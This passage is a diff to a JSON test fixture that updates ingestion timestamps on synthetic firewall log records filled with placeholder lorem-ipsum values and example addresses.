craction=dol crlevel=sciun eventtype=metcons user=itasper service=uae hostname=mve1890.internal.home profile=tatemU reqtype=mad url=https://www.example.org/redol/gnaa.htm?aliquamq=dtempori#toditaut direction=unknown msg=dexerc method=strumex cat=eprehend catdesc=asnu device_id=hitec log_id=henderit pri=medium userfrom=perspici adminprof=ationul timezone=PST main_type=itsedq trigger_policy=uto sub_type=emUte severity_level=molestia policy=quir src=10.46.56.204 src_port=2463 dst=10.234.165.130 dst_port=7079 http_method=umf http_url=quames http_host=dolorsit http_agent=archite http_session_id=remq signature_subclass=veniamq signature_id=1236 srccountry=uta content_switch_name=emo server_pool_name=itq false_positive_mitigation=derit user_name=orese monitor_status=dolor http_refer=https://mail.example.com/ntexpl/dunt.jpg?yCic=nder#mdolore http_version=Cic dev_id=olorema threat_weight=mollita history_threat_weight=tatem threat_level=iae ftp_mode=quido ftp_cmd=emip cipher_suite=inBC msg_id=mol", "event": { - "ingested": "2021-06-29T09:33:01.618235700Z" + "ingested": "2021-12-09T13:37:31.906917200Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "logver=turadipi date=2016-10-26 time=7:58:50 log_id=usmodi devid=ree devname=saquaea logid=ation type=luptas subtype=minim level=very-high vd=lorsi srcip=10.61.123.159 srcport=754 srcintf=eth7713 dstip=10.141.158.225 dstport=4690 dstintf=lo1586 poluuid=ate sessionid=idolor proto=1 action=block policyid=nreprehe trandisp=onse duration=71.505000 sentbyte=4010 rcvdbyte=4527 devtype=duntutla osname=ntium osversion=1.4450 mastersrcmac=asuntexp srcmac=01:00:5e:26:56:73 crscore=5.843000 craction=nse crlevel=modoc eventtype=boNem user=iumt service=tsed hostname=eturad6143.www.home profile=uamnihil reqtype=llam url=https://example.net/aparia/tatnon.jpg?rever=ore#offici direction=outbound msg=metco method=acom cat=ceroinB catdesc=nim device_id=utaliqu log_id=rsi pri=high userfrom=imadmi adminprof=isnis timezone=CEST main_type=olupta trigger_policy=tsuntinc sub_type=inrepreh severity_level=quovo policy=urExcep src=10.128.46.70 src_port=5269 dst=10.95.117.134 dst_port=1723 http_method=acommodi http_url=essecill http_host=billoi http_agent=moles http_session_id=dipiscin signature_subclass=olup signature_id=5976 srccountry=undeomni content_switch_name=accusa server_pool_name=natu false_positive_mitigation=liquid user_name=enim monitor_status=Finibus http_refer=https://www.example.org/xeacom/des.gif?umdolo=ntiu#radipisc http_version=Cice dev_id=taedi threat_weight=tquido history_threat_weight=ptasnula threat_level=oru ftp_mode=ill ftp_cmd=mporinc cipher_suite=onsectet msg_id=idolo", "event": { - "ingested": "2021-06-29T09:33:01.618240Z" + "ingested": "2021-12-09T13:37:31.906923Z" }, "tags": [ "preserve_original_event" @@ -246,7 +246,7 @@ }, "message": "date=2016-11-10 time=3:01:24 logver=edolo devid=ugiatquo devname=ntium logid=uptate type=lloinven subtype=econs level=medium vd=tetura srcip=10.135.106.42 srcport=6602 srcintf=lo154 dstip=10.224.30.160 dstport=5302 dstintf=eth1247 poluuid=etconsec sessionid=caboNem proto=21 action=cancel policyid=rumetMal trandisp=oconse duration=2.970000 sentbyte=7685 rcvdbyte=1506 devtype=sequam osname=oditempo osversion=1.7544 mastersrcmac=taliqui srcmac=01:00:5e:98:79:a3 crscore=78.248000 craction=rcitat crlevel=dolorema eventtype=emagn user=radipis service=ctetu hostname=orinrep5386.www.corp profile=stenatus reqtype=equep url=https://www.example.com/tali/BCS.txt?iqu=niamqu#equamnih direction=inbound msg=autemv method=emq cat=plicaboN catdesc=amc device_id=vol log_id=admi pri=medium userfrom=culpaq adminprof=saute timezone=GMT+02:00 main_type=ende trigger_policy=abor sub_type=magnid severity_level=adol policy=iutal src=10.208.21.135 src_port=2721 dst=10.253.228.140 dst_port=6748 http_method=ugitse http_url=quiineav http_host=billoinv http_agent=sci http_session_id=col signature_subclass=obea signature_id=5700 srccountry=tatev content_switch_name=luptas server_pool_name=uptatem false_positive_mitigation=oinv user_name=inculp monitor_status=onofd http_refer=https://internal.example.org/nisiu/imad.html?ptatem=itasp#dexe http_version=tat dev_id=onproide threat_weight=ntmo history_threat_weight=loreeu threat_level=temse ftp_mode=aspernat ftp_cmd=ume cipher_suite=caecat msg_id=rautod", "event": { - "ingested": "2021-06-29T09:33:01.618245400Z" + "ingested": "2021-12-09T13:37:31.906928700Z" }, "tags": [ "preserve_original_event" @@ -258,7 +258,7 @@ }, "message": "logver=ercitat date=2016-11-24 time=10:03:59 log_id=lapar devid=ritati devname=edquia logid=itesse type=mullam subtype=mexerc level=medium vd=amvolu srcip=10.120.231.161 srcport=1129 srcintf=lo653 dstip=10.210.62.203 dstport=4381 dstintf=lo3057 poluuid=ataevita sessionid=oremqu proto=6 action=cancel policyid=velitsed trandisp=magnaali duration=92.900000 sentbyte=3984 rcvdbyte=4009 devtype=ulla osname=equatDu osversion=1.1710 mastersrcmac=aconse srcmac=01:00:5e:92:c2:23 crscore=20.350000 craction=squira crlevel=aliqui eventtype=ess user=uide service=scivel hostname=henderi724.www5.home profile=tquas reqtype=aquio url=https://www.example.com/iame/orroquis.htm?tiumd=ntmoll#mexer direction=internal msg=isnostru method=nofdeFi cat=aquioff catdesc=saqu device_id=remips log_id=illoi pri=medium userfrom=abori adminprof=uisnostr timezone=GMT+02:00 main_type=ilmole trigger_policy=ugi sub_type=niamquis severity_level=nisi policy=emveleum src=10.243.226.122 src_port=3512 dst=10.3.23.172 dst_port=7332 http_method=emullamc http_url=tec http_host=Nemo http_agent=tutlabo http_session_id=mveleum signature_subclass=liq signature_id=7229 srccountry=sBonorum content_switch_name=atems server_pool_name=quira false_positive_mitigation=tassita user_name=olorem monitor_status=sedquiac http_refer=https://www.example.com/atDuis/asnulapa.html?rumwri=velill#ore http_version=tation dev_id=loinve threat_weight=tatevel history_threat_weight=iumdolo threat_level=untu ftp_mode=ict ftp_cmd=squirati cipher_suite=tem msg_id=mestq", "event": { - "ingested": "2021-06-29T09:33:01.618249700Z" + "ingested": "2021-12-09T13:37:31.906934400Z" }, "tags": [ "preserve_original_event" @@ -270,7 +270,7 @@ }, "message": "logver=luptate date=2016-12-8 time=5:06:33 log_id=llamc devid=eleumiu devname=uei logid=Nequepo type=radipis subtype=cive level=low vd=orumSec srcip=10.56.74.7 srcport=6149 srcintf=eth2940 dstip=10.73.10.215 dstport=2079 dstintf=lo3472 poluuid=oeni sessionid=untutlab proto=0 action=cancel policyid=consecte trandisp=pteurs duration=26.872000 sentbyte=617 rcvdbyte=1651 devtype=ons osname=tiaecon osversion=1.5380 mastersrcmac=unt srcmac=01:00:5e:99:7b:4a crscore=124.392000 craction=queporro crlevel=uid eventtype=snostrum user=psa service=nculpaq hostname=reseosqu1629.mail.lan profile=utemvel reqtype=epteur url=https://www.example.net/iame/laudanti.htm?stquido=rsitvolu#mnisi direction=external msg=uameiusm method=adm cat=gelitsed catdesc=tiumto device_id=cor log_id=odoco pri=high userfrom=labore adminprof=ianonnu timezone=PST main_type=rum trigger_policy=erc sub_type=ehende severity_level=tutla policy=licaboNe src=10.94.242.80 src_port=2724 dst=10.106.85.174 dst_port=307 http_method=atiset http_url=serror http_host=onse http_agent=umquam http_session_id=emagn signature_subclass=emulla signature_id=1963 srccountry=iquaUt content_switch_name=mnihilm server_pool_name=redo false_positive_mitigation=etMaloru user_name=lmo monitor_status=iquidex http_refer=https://www.example.org/remipsu/tan.html?mcorpor=doconse#etdol http_version=dolorsi dev_id=nturmag threat_weight=tura history_threat_weight=osquirat threat_level=equat ftp_mode=aliquid ftp_cmd=usantiu cipher_suite=idunt msg_id=atqu", "event": { - "ingested": "2021-06-29T09:33:01.618253300Z" + "ingested": "2021-12-09T13:37:31.906940200Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "logver=liquam dtime=2016-12-23 00:09:07.712538723 +0000 UTC devid=min devname=oluptat vd=odt date=2016-12-23 time=12:09:07 logid=rspici type=snisi subtype=magnaal level=low eventtime=etquasia logtime=nula srcip=10.117.63.181 srcport=5299 srcintf=lo7416 srcintfrole=Cicero dstip=10.247.53.179 dstport=6493 dstintf=lo3706 dstintfrole=atemaccu poluuid=veritat sessionid=aliquipe proto=3 action=block policyid=aer policytype=osquira crscore=171.144000 craction=minim crlevel=scipi appcat=tur service=acon srccountry=Nemoenim dstcountry=usm trandisp=labori tranip=10.168.20.20 tranport=68 duration=167.038000 sentbyte=7188 rcvdbyte=5749 sentpkt=xeac app=umdolors", "event": { - "ingested": "2021-06-29T09:33:01.618258700Z" + "ingested": "2021-12-09T13:37:31.906944300Z" }, "tags": [ "preserve_original_event" @@ -294,7 +294,7 @@ }, "message": "logver=uiadolo date=2017-1-6 time=7:11:41 log_id=empor devid=umexerci devname=duntut logid=uovol type=prehend subtype=eufug level=low vd=eufug srcip=10.100.53.8 srcport=4318 srcintf=eth5767 dstip=10.163.17.172 dstport=854 dstintf=enp0s3903 poluuid=upta sessionid=atc proto=3 action=block policyid=upta trandisp=itessequ duration=165.935000 sentbyte=4211 rcvdbyte=405 devtype=exerci osname=idata osversion=1.2208 mastersrcmac=usmod srcmac=01:00:5e:c0:47:f3 crscore=135.374000 craction=isiutali crlevel=iquidexe eventtype=illumq user=luptatem service=ite hostname=tasnul4179.internal.host profile=amvo reqtype=tnul url=https://www.example.org/ess/quiad.jpg?ten=litanim#rQuisaut direction=inbound msg=modico method=metco cat=cillu catdesc=iuntNeq device_id=eddoei log_id=rsin pri=very-high userfrom=eriam adminprof=pernat timezone=CEST main_type=imve trigger_policy=essequam sub_type=ueporro severity_level=aliqu policy=upt src=10.141.156.217 src_port=2700 dst=10.53.168.187 dst_port=73 http_method=emacc http_url=emp http_host=lamcola http_agent=veli http_session_id=venia signature_subclass=risni signature_id=1535 srccountry=uat content_switch_name=onemulla server_pool_name=riaturEx false_positive_mitigation=deri user_name=amqu monitor_status=lorsitam http_refer=https://api.example.org/onpr/litseddo.gif?oremqu=idex#radip http_version=upta dev_id=tetura threat_weight=rumet history_threat_weight=uptasnul threat_level=antiumdo ftp_mode=ecill ftp_cmd=iduntu cipher_suite=pisci msg_id=sunt", "event": { - "ingested": "2021-06-29T09:33:01.618266300Z" + "ingested": "2021-12-09T13:37:31.906948900Z" }, "tags": [ "preserve_original_event" @@ -306,7 +306,7 @@ }, "message": "date=2017-1-20 time=2:14:16 devname=oco device_id=aboree log_id=ainci type=generic subtype=osqu pri=very-high devid=sus devname=imavenia logid=expli type=ugiat subtype=rnat level=low vd=orem srcip=10.37.174.58 srcport=3193 srcintf=lo2990 dstip=10.249.60.66 dstport=4859 dstintf=enp0s1732 poluuid=eve sessionid=tco proto=3 action=accept policyid=oluptate trandisp=lit duration=70.988000 sentbyte=6327 rcvdbyte=837 devtype=oquisqu osname=turadip osversion=1.3402 mastersrcmac=amc srcmac=01:00:5e:dd:dc:44 crscore=160.379000 craction=apar crlevel=runtm eventtype=eturadip user=olorsi service=itseddo hostname=bore5546.www.local profile=labo reqtype=lpaquiof url=https://example.com/xeac/llitanim.txt?oreverit=scip#Finibus direction=inbound msg=eufugia method=ncididun cat=hen catdesc=periamea device_id=itametco log_id=vel pri=high userfrom=rere adminprof=pta timezone=CEST main_type=equeporr trigger_policy=met sub_type=volup severity_level=ptate policy=entsu src=10.44.198.184 src_port=5695 dst=10.189.82.19 dst_port=4267 http_method=odoc http_url=atura http_host=tur http_agent=tur http_session_id=atnonpr signature_subclass=ita signature_id=7570 srccountry=colabori content_switch_name=imidestl server_pool_name=piscing false_positive_mitigation=ceroi user_name=iconsequ monitor_status=iat http_refer=https://www.example.net/siuta/atev.htm?CSe=exerci#inesciu http_version=quid dev_id=atcupid threat_weight=onse history_threat_weight=psa threat_level=ate ftp_mode=con ftp_cmd=tqu cipher_suite=eirur msg_id=dese", "event": { - "ingested": "2021-06-29T09:33:01.618270900Z" + "ingested": "2021-12-09T13:37:31.906954200Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "logver=mquisnos date=2017-2-3 time=9:16:50 log_id=lore devid=isci devname=Dui logid=reetdo type=ever subtype=civelits level=high vd=quiav srcip=10.154.34.15 srcport=5986 srcintf=enp0s4064 dstip=10.153.172.249 dstport=7030 dstintf=enp0s3067 poluuid=henderit sessionid=remq proto=21 action=cancel policyid=tla trandisp=arch duration=52.795000 sentbyte=5453 rcvdbyte=3097 devtype=ror osname=onsecte osversion=1.91 mastersrcmac=aecatcup srcmac=01:00:5e:58:7e:f5 crscore=133.560000 craction=quas crlevel=occaeca eventtype=eturadip user=ent service=rumSecti hostname=Utenima260.mail.invalid profile=cept reqtype=aedictas url=https://api.example.org/orio/gna.gif?aaliquaU=olu#iameaque direction=external msg=essequa method=aquio cat=rspicia catdesc=deom device_id=oluptat log_id=roinBCSe pri=medium userfrom=onproide adminprof=uamnih timezone=GMT+02:00 main_type=tatisetq trigger_policy=uidolo sub_type=umdolore severity_level=dmi policy=tam src=10.151.170.207 src_port=1400 dst=10.181.183.104 dst_port=5554 http_method=amni http_url=tatio http_host=amquisno http_agent=modoc http_session_id=magnam signature_subclass=uinesc signature_id=4248 srccountry=idatat content_switch_name=onev server_pool_name=orsi false_positive_mitigation=ntsunt user_name=iosamni monitor_status=idu http_refer=https://example.net/idolo/reet.txt?its=umdolor#isiu http_version=assi dev_id=eserun threat_weight=rvelill history_threat_weight=lupta threat_level=byC ftp_mode=imadm ftp_cmd=uta cipher_suite=tisu msg_id=remagnam", "event": { - "ingested": "2021-06-29T09:33:01.618276300Z" + "ingested": "2021-12-09T13:37:31.906958900Z" }, "tags": [ "preserve_original_event" @@ -330,7 +330,7 @@ }, "message": "logver=iumdo date=2017-2-18 time=4:19:24 log_id=iusmodit devid=aturv devname=ectetura logid=obeataev type=umf subtype=olesti level=low vd=quaeabil srcip=10.19.99.129 srcport=956 srcintf=eth62 dstip=10.205.132.218 dstport=1643 dstintf=enp0s5908 poluuid=inim sessionid=etdol proto=17 action=deny policyid=oremeumf trandisp=lesti duration=49.961000 sentbyte=3376 rcvdbyte=6209 devtype=enima osname=tnulapar osversion=1.7278 mastersrcmac=sequ srcmac=01:00:5e:4a:1d:f8 crscore=84.522000 craction=tionula crlevel=accus eventtype=uatu user=mquis service=lab hostname=uido2046.mail.lan profile=tena reqtype=aal url=https://mail.example.org/nimadmin/lumqui.txt?iquip=tinculpa#umtota direction=external msg=rumSecti method=riamea cat=eca catdesc=oluptate device_id=Duisa log_id=consequa pri=low userfrom=iaecon adminprof=aevitaed timezone=PT main_type=rep trigger_policy=remap sub_type=deri severity_level=quaeratv policy=involu src=10.70.7.23 src_port=2758 dst=10.130.240.11 dst_port=6515 http_method=odic http_url=iuta http_host=liquaUte http_agent=scivelit http_session_id=Nequ signature_subclass=quid signature_id=1044 srccountry=lloinve content_switch_name=borisnis server_pool_name=onorumet false_positive_mitigation=ptatema user_name=eavolup monitor_status=ipsumq http_refer=https://www.example.org/tno/iss.gif?ptatev=atu#teturad http_version=eturad dev_id=tDuis threat_weight=mwritten history_threat_weight=tat threat_level=equ ftp_mode=sumdolo ftp_cmd=idolorem cipher_suite=temvele msg_id=oremque", "event": { - "ingested": "2021-06-29T09:33:01.618283800Z" + "ingested": "2021-12-09T13:37:31.906963800Z" }, "tags": [ "preserve_original_event" @@ -342,7 +342,7 @@ }, "message": "logver=inimve devname=\"uio\" devid=\"mexercit\" vd=byC date=2017-3-4 time=11:21:59 logid=uae type=oremip subtype=its level=very-high eventtime=iavol logtime=natuserr srcip=10.37.161.101 srcport=1552 srcintf=enp0s6659 srcintfrole=evit dstip=10.111.182.212 dstport=4493 dstintf=lo6533 dstintfrole=lamco poluuid=tion sessionid=hender proto=icmp action=deny policyid=seq policytype=rumSe crscore=88.660000 craction=madmi crlevel=tlabore appcat=idunt service=expl srccountry=olore dstcountry=uian trandisp=atuserro tranip=10.17.209.252 tranport=2119 duration=135.770000 sentbyte=313 rcvdbyte=6509 sentpkt=oinBCS app=itsedd", "event": { - "ingested": "2021-06-29T09:33:01.618288900Z" + "ingested": "2021-12-09T13:37:31.906967700Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "logver=ipis devname=\"itautfu\" devid=\"nesci\" vd=tam date=2017-3-18 time=6:24:33 logid=sin type=idexeac subtype=nimadmin level=medium eventtime=edutper logtime=tevelite srcip=10.158.175.98 srcport=1491 srcintf=enp0s7649 srcintfrole=oinBCSed dstip=10.170.196.181 dstport=6994 dstintf=enp0s5873 dstintfrole=obeatae poluuid=iquid sessionid=evo proto=udp action=allow policyid=mqu policytype=pteursi crscore=98.596000 craction=expl crlevel=essecill appcat=totamre service=rpo srccountry=velites dstcountry=nonpro trandisp=nula tranip=10.153.166.133 tranport=4638 duration=39.506000 sentbyte=6610 rcvdbyte=1936 sentpkt=olu app=imide", "event": { - "ingested": "2021-06-29T09:33:01.618292900Z" + "ingested": "2021-12-09T13:37:31.906971800Z" }, "tags": [ "preserve_original_event" @@ -366,7 +366,7 @@ }, "message": "date=2017-4-2 time=1:27:07 logver=amn devid=itessequ devname=porissu logid=umd type=sumd subtype=sectetur level=low vd=aUtenima srcip=10.62.10.137 srcport=5596 srcintf=lo6539 dstip=10.138.249.251 dstport=630 dstintf=eth1576 poluuid=deritinv sessionid=evelite proto=6 action=accept policyid=stiaecon trandisp=usBono duration=155.835000 sentbyte=3942 rcvdbyte=5360 devtype=ttenb osname=olor osversion=1.5978 mastersrcmac=lapa srcmac=01:00:5e:b0:3e:44 crscore=105.845000 craction=lors crlevel=oluptat eventtype=enimad user=tis service=qua hostname=con6049.internal.lan profile=quelaud reqtype=luptat url=https://internal.example.com/temse/caecat.jpg?emeu=tatemac#quisn direction=inbound msg=teursint method=etMa cat=llita catdesc=ntsunt device_id=nturmag log_id=uredol pri=high userfrom=temsequi adminprof=mquia timezone=ET main_type=enbyCic trigger_policy=iveli sub_type=conseq severity_level=itame policy=tenat src=10.63.171.91 src_port=4396 dst=10.48.25.200 dst_port=5179 http_method=nse http_url=mveniam http_host=tuser http_agent=mmo http_session_id=eve signature_subclass=nbyCicer signature_id=6129 srccountry=ciad content_switch_name=ugiatqu server_pool_name=eruntmo false_positive_mitigation=nimve user_name=usanti monitor_status=ion http_refer=https://mail.example.org/gelits/iavo.txt?udexerc=ovolupta#volup http_version=macc dev_id=ria threat_weight=beat history_threat_weight=rro threat_level=tuser ftp_mode=ctasu ftp_cmd=irat cipher_suite=sitame msg_id=oinven", "event": { - "ingested": "2021-06-29T09:33:01.618301400Z" + "ingested": "2021-12-09T13:37:31.906975400Z" }, "tags": [ "preserve_original_event" @@ -378,7 +378,7 @@ }, "message": "logver=ute dtime=2017-04-16 08:29:41.792538723 +0000 UTC devid=mexer devname=iam vd=Bonoru date=2017-4-16 time=8:29:41 logid=rcitati type=nula subtype=ameaquei level=low eventtime=adipi logtime=mquis srcip=10.174.17.46 srcport=2743 srcintf=eth6814 srcintfrole=ine dstip=10.77.105.81 dstport=4455 dstintf=enp0s7799 dstintfrole=orem poluuid=giatqu sessionid=rsint proto=udp action=allow policyid=paq policytype=uianon crscore=60.762000 craction=uisautem crlevel=mquameiu appcat=loremq service=turmagni srccountry=ores dstcountry=ddoe trandisp=uid tranip=10.38.168.190 tranport=7260 duration=129.140000 sentbyte=368 rcvdbyte=7791 sentpkt=incidi app=aedictas", "event": { - "ingested": "2021-06-29T09:33:01.618305600Z" + "ingested": "2021-12-09T13:37:31.906980Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "logver=temaccus devname=\"ons\" devid=\"unt\" vd=liq date=2017-4-30 time=3:32:16 logid=abore type=iumdo subtype=oreeu level=high eventtime=exe logtime=tis srcip=10.36.99.207 srcport=4829 srcintf=lo497 srcintfrole=tvol dstip=10.225.37.73 dstport=5630 dstintf=eth1882 dstintfrole=eniamqu poluuid=iumt sessionid=porissus proto=udp action=cancel policyid=tsunt policytype=rnat crscore=88.508000 craction=ured crlevel=ctetu appcat=oreeu service=uasiarch srccountry=Malor dstcountry=boriosa trandisp=cillumdo tranip=10.166.142.198 tranport=4151 duration=1.040000 sentbyte=465 rcvdbyte=7663 sentpkt=oreetd app=lor", "event": { - "ingested": "2021-06-29T09:33:01.618312100Z" + "ingested": "2021-12-09T13:37:31.906986200Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "logver=etc devname=\"eturadip\" devid=\"nost\" vd=atus date=2017-5-14 time=10:34:50 logid=tassitas type=obea subtype=velite level=medium eventtime=litse logtime=san srcip=10.66.90.225 srcport=4846 srcintf=lo4891 srcintfrole=moenimi dstip=10.214.156.161 dstport=3854 dstintf=eth1188 dstintfrole=ati poluuid=rauto sessionid=doloreeu proto=6 action=block policyid=eumfu policytype=docons crscore=3.408000 craction=eumf crlevel=roquisq appcat=uasi service=maveniam srccountry=uis dstcountry=lill trandisp=remeum tranip=10.145.194.12 tranport=1001 duration=25.398000 sentbyte=6452 rcvdbyte=6820 sentpkt=aturE app=umto", "event": { - "ingested": "2021-06-29T09:33:01.618317400Z" + "ingested": "2021-12-09T13:37:31.906991500Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "logver=pariat devname=\"iutal\" devid=\"teturad\" vd=ese date=2017-5-29 time=5:37:24 logid=eddoei type=lorumw subtype=eca level=medium eventtime=nimve logtime=duntut srcip=10.6.242.108 srcport=3373 srcintf=lo3230 srcintfrole=qua dstip=10.156.208.5 dstport=7612 dstintf=lo1800 dstintfrole=quisn poluuid=pteu sessionid=uatD proto=0 action=cancel policyid=antiu policytype=velillum crscore=166.389000 craction=iatquovo crlevel=lapari appcat=Mal service=itinvo srccountry=snulap dstcountry=cidu trandisp=hilmol tranip=10.163.36.101 tranport=253 duration=72.488000 sentbyte=1880 rcvdbyte=4638 sentpkt=ident app=scip", "event": { - "ingested": "2021-06-29T09:33:01.618323Z" + "ingested": "2021-12-09T13:37:31.906997600Z" }, "tags": [ "preserve_original_event" @@ -426,7 +426,7 @@ }, "message": "date=2017-6-12 time=12:39:58 devname=uamqu device_id=iusmodi log_id=esciun type=generic subtype=tasnul pri=medium devid=ccusant devname=epteurs logid=rmag type=quisquam subtype=eporroqu level=very-high vd=dit srcip=10.25.134.171 srcport=7867 srcintf=eth4543 dstip=10.43.235.230 dstport=2198 dstintf=lo4581 poluuid=BCSe sessionid=rem proto=0 action=allow policyid=eeufug trandisp=ntin duration=6.686000 sentbyte=5763 rcvdbyte=1048 devtype=cinge osname=tatem osversion=1.4713 mastersrcmac=eritqu srcmac=01:00:5e:ed:6b:57 crscore=10.603000 craction=nimip crlevel=iutaliq eventtype=olore user=onemul service=trudexe hostname=remeum2641.www5.corp profile=Quisa reqtype=quiav url=https://www5.example.com/elit/sam.htm?nevolu=unt#isni direction=outbound msg=ecillum method=olor cat=amei catdesc=doconseq device_id=conseq log_id=emve pri=very-high userfrom=tiu adminprof=wri timezone=GMT-07:00 main_type=asper trigger_policy=dictasun sub_type=psa severity_level=lorese policy=olupta src=10.220.148.127 src_port=6681 dst=10.68.233.163 dst_port=3126 http_method=itanimi http_url=onoru http_host=data http_agent=ugits http_session_id=ittenb signature_subclass=tobeatae signature_id=5617 srccountry=quis content_switch_name=exe server_pool_name=naa false_positive_mitigation=equat user_name=estiaec monitor_status=pitlabo http_refer=https://example.net/rcitat/ree.htm?ionofdeF=rsp#imipsa http_version=nostrum dev_id=autodita threat_weight=ntut history_threat_weight=temveleu threat_level=itametco ftp_mode=etcons ftp_cmd=etco cipher_suite=iuntN msg_id=utfugi", "event": { - "ingested": "2021-06-29T09:33:01.618330700Z" + "ingested": "2021-12-09T13:37:31.907003400Z" }, "tags": [ "preserve_original_event" @@ -438,7 +438,7 @@ }, "message": "logver=isnostru date=2017-6-26 time=7:42:33 log_id=nul devid=ntocca devname=trudex logid=tvol type=lup subtype=mipsamv level=medium vd=qua srcip=10.249.194.7 srcport=4987 srcintf=enp0s2282 dstip=10.57.116.17 dstport=90 dstintf=enp0s7442 poluuid=xcep sessionid=gnidol proto=0 action=allow policyid=uaeab trandisp=ptat duration=136.310000 sentbyte=1078 rcvdbyte=6196 devtype=eturadip osname=amquaera osversion=1.4481 mastersrcmac=equ srcmac=01:00:5e:00:fd:79 crscore=18.750000 craction=olesti crlevel=edquia eventtype=ihi user=undeomn service=ape hostname=itaspe3216.localdomain profile=onsecte reqtype=prehende url=https://example.org/porro/issu.htm?inculpa=ruredol#iadeseru direction=unknown msg=numq method=quae cat=periam catdesc=ain device_id=umiurer log_id=mquido pri=very-high userfrom=onorume adminprof=abill timezone=GMT+02:00 main_type=uov trigger_policy=mini sub_type=mve severity_level=tionev policy=uasiarch src=10.116.82.108 src_port=7276 dst=10.94.177.125 dst_port=6683 http_method=nimides http_url=olorsit http_host=naaliq http_agent=plica http_session_id=asiarc signature_subclass=lor signature_id=5152 srccountry=snula content_switch_name=pici server_pool_name=bori false_positive_mitigation=dipi user_name=ecatc monitor_status=quovolu http_refer=https://example.net/itse/sse.gif?lupt=quatur#dminim http_version=ptatevel dev_id=aperiame threat_weight=stenat history_threat_weight=uianonnu threat_level=tatiset ftp_mode=quira ftp_cmd=ciatisun cipher_suite=duntutl msg_id=nven", "event": { - "ingested": "2021-06-29T09:33:01.618338300Z" + "ingested": "2021-12-09T13:37:31.907009100Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "date=2017-7-11 time=2:45:07 devname=saq device_id=asiarch log_id=ssuscipi type=generic subtype=utla pri=medium devid=tquovo devname=fugi logid=nse type=nesciu subtype=todit level=very-high vd=inrepreh srcip=10.14.192.162 srcport=2536 srcintf=enp0s4429 dstip=10.179.128.6 dstport=3375 dstintf=enp0s4580 poluuid=ptate sessionid=volupta proto=3 action=cancel policyid=utla trandisp=emi duration=171.651000 sentbyte=3313 rcvdbyte=7131 devtype=velites osname=oloremi osversion=1.4442 mastersrcmac=apari srcmac=01:00:5e:0c:fb:2b crscore=140.065000 craction=uel crlevel=fficiad eventtype=teirured user=nostru service=rcit hostname=mea6298.api.example profile=eumiu reqtype=tatevel url=https://mail.example.org/uamquaer/texplica.gif?sequa=lorum#suntexpl direction=inbound msg=Sedut method=tatis cat=audant catdesc=obeata device_id=uredol log_id=uptat pri=low userfrom=entorev adminprof=quuntur timezone=GMT+02:00 main_type=exercit trigger_policy=dexer sub_type=idolor severity_level=onpr policy=uira src=10.115.121.243 src_port=550 dst=10.113.152.241 dst_port=2330 http_method=ali http_url=udexerci http_host=uae http_agent=imveni http_session_id=econ signature_subclass=aborio signature_id=1122 srccountry=setquas content_switch_name=nbyCi server_pool_name=runtmoll false_positive_mitigation=busBon user_name=norumetM monitor_status=isno http_refer=https://internal.example.com/ameaq/Quis.html?lestiae=iav#umiure http_version=isiut dev_id=tin threat_weight=rporiss history_threat_weight=billoinv threat_level=etconse ftp_mode=nesciu ftp_cmd=mali cipher_suite=roinBCSe msg_id=eetdolor", "event": { - "ingested": "2021-06-29T09:33:01.618342300Z" + "ingested": "2021-12-09T13:37:31.907014800Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "date=2017-7-25 time=9:47:41 logver=upt devid=equamni devname=atcupi logid=enima type=uptateve subtype=fugitsed level=medium vd=lorem srcip=10.68.159.207 srcport=3320 srcintf=enp0s7206 dstip=10.139.195.188 dstport=893 dstintf=enp0s6960 poluuid=lits sessionid=tvolu proto=17 action=accept policyid=ollitan trandisp=temseq duration=0.684000 sentbyte=3045 rcvdbyte=6863 devtype=edictasu osname=eturadi osversion=1.3804 mastersrcmac=edquiano srcmac=01:00:5e:09:79:f2 crscore=11.231000 craction=taevitae crlevel=tevel eventtype=tatemse user=gitsed service=agn hostname=iqu7510.internal.corp profile=equeporr reqtype=amremap url=https://www5.example.org/aqu/utemvele.gif?serrorsi=tsedquia#rsit direction=unknown msg=ntutlabo method=idex cat=nihilmo catdesc=reetdo device_id=xeaco log_id=taliqu pri=medium userfrom=hite adminprof=umfugi timezone=CT main_type=dminimve trigger_policy=remips sub_type=laboreet severity_level=uptate policy=tot src=10.49.82.45 src_port=435 dst=10.179.153.97 dst_port=1908 http_method=ade http_url=nihilmol http_host=nder http_agent=ano http_session_id=rumexer signature_subclass=eab signature_id=2387 srccountry=saquaeab content_switch_name=eli server_pool_name=rissusci false_positive_mitigation=ectetur user_name=dictasun monitor_status=inimv http_refer=https://api.example.org/volup/untNeq.htm?mremaper=uteirur#ntium http_version=ide dev_id=quunturm threat_weight=quovo history_threat_weight=quaturve threat_level=ntiumdol ftp_mode=conse ftp_cmd=aturve cipher_suite=edqui msg_id=tvolu", "event": { - "ingested": "2021-06-29T09:33:01.618346600Z" + "ingested": "2021-12-09T13:37:31.907020500Z" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "message": "logver=ore devname=\"lors\" devid=\"saute\" vd=ecillumd date=2017-8-8 time=4:50:15 logid=iumto type=sequatu subtype=tiumtot level=medium eventtime=mdoloree logtime=que srcip=10.98.52.184 srcport=7402 srcintf=eth3784 srcintfrole=ita dstip=10.99.55.115 dstport=1537 dstintf=eth855 dstintfrole=isnostru poluuid=iad sessionid=ngelits proto=tcp action=accept policyid=billoi policytype=reseo crscore=158.047000 craction=uov crlevel=pariat appcat=icaboNe service=boreetd srccountry=uir dstcountry=rumex trandisp=ectobea tranip=10.205.83.138 tranport=6239 duration=170.113000 sentbyte=3290 rcvdbyte=722 sentpkt=ibus app=lumdol", "event": { - "ingested": "2021-06-29T09:33:01.618350100Z" + "ingested": "2021-12-09T13:37:31.907026200Z" }, "tags": [ "preserve_original_event" @@ -486,7 +486,7 @@ }, "message": "logver=onnu devname=\"reprehe\" devid=\"metMa\" vd=emoen date=2017-8-22 time=11:52:50 logid=ptate type=mipsumqu 